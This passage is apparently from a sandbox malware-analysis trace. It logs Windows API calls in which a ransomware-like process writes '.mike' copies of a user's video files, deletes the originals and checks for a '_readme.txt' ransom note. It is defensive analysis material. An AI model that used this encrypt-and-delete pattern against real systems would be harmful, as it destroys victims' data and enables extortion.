dwFileAttributes=0x80) returned 1 [0155.250] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7f7G9705nquBATl.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7f7g9705nqubatl.avi")) returned 1 [0155.252] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.253] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.254] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4.mike", lpFilePart=0x0) returned 0x40 [0155.254] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4", lpFilePart=0x0) returned 0x3b [0155.260] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4.mike", lpFilePart=0x0) returned 0x40 [0155.260] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4.mike", lpFilePart=0x0) returned 0x40 [0155.261] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4", dwFileAttributes=0x80) returned 1 [0155.261] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7Inz8U2 4w-NyAepoz.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7inz8u2 4w-nyaepoz.mp4")) returned 1 [0155.263] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.264] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv.mike", lpFilePart=0x0) returned 0x39 [0155.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv", lpFilePart=0x0) returned 0x34 [0155.271] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv.mike", lpFilePart=0x0) returned 0x39 [0155.271] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv.mike", lpFilePart=0x0) returned 0x39 [0155.272] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv", dwFileAttributes=0x80) returned 1 [0155.272] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bC_DmmJxlLv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bc_dmmjxllv.flv")) returned 1 [0155.275] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.276] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.277] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi.mike", lpFilePart=0x0) returned 0x41 [0155.277] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi", lpFilePart=0x0) returned 0x3c [0155.280] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi.mike", lpFilePart=0x0) returned 0x41 [0155.281] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi.mike", lpFilePart=0x0) returned 0x41 [0155.281] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi", dwFileAttributes=0x80) returned 1 [0155.282] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bSj2cBpU8HUYaznAZ3c.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bsj2cbpu8huyaznaz3c.avi")) returned 1 [0155.283] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.284] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.285] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi.mike", lpFilePart=0x0) returned 0x38 [0155.286] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi", lpFilePart=0x0) returned 0x33 [0155.292] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi.mike", lpFilePart=0x0) returned 0x38 [0155.292] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi.mike", lpFilePart=0x0) returned 0x38 [0155.292] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi", dwFileAttributes=0x80) returned 1 [0155.293] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FGrRwV9qla.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fgrrwv9qla.avi")) returned 1 [0155.294] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.296] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.296] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4.mike", lpFilePart=0x0) returned 0x3d [0155.297] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4", lpFilePart=0x0) returned 0x38 [0155.301] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4.mike", lpFilePart=0x0) returned 0x3d [0155.301] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4.mike", lpFilePart=0x0) returned 0x3d [0155.301] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4", dwFileAttributes=0x80) returned 1 [0155.302] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fhpUHzQ0IZunmJF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fhpuhzq0izunmjf.mp4")) returned 1 [0155.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.305] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf.mike", lpFilePart=0x0) returned 0x3d [0155.306] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf", lpFilePart=0x0) returned 0x38 [0155.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf.mike", lpFilePart=0x0) returned 0x3d [0155.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf.mike", lpFilePart=0x0) returned 0x3d [0155.313] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf", dwFileAttributes=0x80) returned 1 [0155.314] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ickpRwjz2Gh9-x8.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ickprwjz2gh9-x8.swf")) returned 1 [0155.316] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.317] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4.mike", lpFilePart=0x0) returned 0x3f [0155.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4", lpFilePart=0x0) returned 0x3a [0155.324] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4.mike", lpFilePart=0x0) returned 0x3f [0155.325] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4.mike", lpFilePart=0x0) returned 0x3f [0155.325] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4", dwFileAttributes=0x80) returned 1 [0155.325] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\M_cGnXVw69 _Ilt82.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\m_cgnxvw69 _ilt82.mp4")) returned 1 [0155.327] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.329] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8gStSx.flv.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8gStSx.flv.mike", lpFilePart=0x0) returned 0x35 [0155.337] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8gStSx.flv.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8gStSx.flv.mike", lpFilePart=0x0) returned 0x35 [0155.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8gStSx.flv.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8gStSx.flv.mike", lpFilePart=0x0) returned 0x35 [0155.338] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8gStSx.flv", dwFileAttributes=0x80) returned 1 [0155.338] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n8gStSx.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n8gstsx.flv")) returned 1 [0155.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_readme.txt", lpFilePart=0x0) returned 0x30 [0155.342] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OlVn2gmSRCF.swf.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OlVn2gmSRCF.swf.mike", lpFilePart=0x0) returned 0x39 [0155.347] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OlVn2gmSRCF.swf.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OlVn2gmSRCF.swf.mike", lpFilePart=0x0) returned 0x39 [0155.348] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OlVn2gmSRCF.swf.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OlVn2gmSRCF.swf.mike", lpFilePart=0x0) returned 0x39 [0155.348] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OlVn2gmSRCF.swf", dwFileAttributes=0x80) returned 1 [0155.348] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\OlVn2gmSRCF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\olvn2gmsrcf.swf")) returned 1 [0155.351] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.361] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pTeNIfUqv.avi", dwFileAttributes=0x80) returned 1 [0155.362] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pTeNIfUqv.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ptenifuqv.avi")) returned 1 [0155.365] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.374] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w0I_ud3.swf", dwFileAttributes=0x80) returned 1 [0155.375] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\w0I_ud3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w0i_ud3.swf")) returned 1 [0155.378] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0155.388] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ya-8setfUv6R80_ZbT.mp4", dwFileAttributes=0x80) returned 1 [0155.388] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ya-8setfUv6R80_ZbT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ya-8setfuv6r80_zbt.mp4")) returned 1 [0155.393] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.393] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.393] CoTaskMemFree (pv=0x508980) [0155.394] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.399] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5000 [0155.405] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\2eBdEXFtbJ0Lj4c.swf", dwFileAttributes=0x80) returned 1 [0155.405] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\2eBdEXFtbJ0Lj4c.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\2ebdexftbj0lj4c.swf")) returned 1 [0155.408] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.428] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\2u1VOKbU1VqZ8Mn.mp4", dwFileAttributes=0x80) returned 1 [0155.428] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\2u1VOKbU1VqZ8Mn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\2u1vokbu1vqz8mn.mp4")) returned 1 [0155.432] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.438] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\7Ab0guRcpz5ePk-En_.avi", dwFileAttributes=0x80) returned 1 [0155.438] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\7Ab0guRcpz5ePk-En_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tousykinuwnv4x\\7ab0gurcpz5epk-en_.avi")) returned 1 [0155.441] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0155.450] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tOUSYKInUwNv4X\\80_LAq1cZxBo5YKQM.avi", dwFileAttributes=0x80) returned 1 [0155.450] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 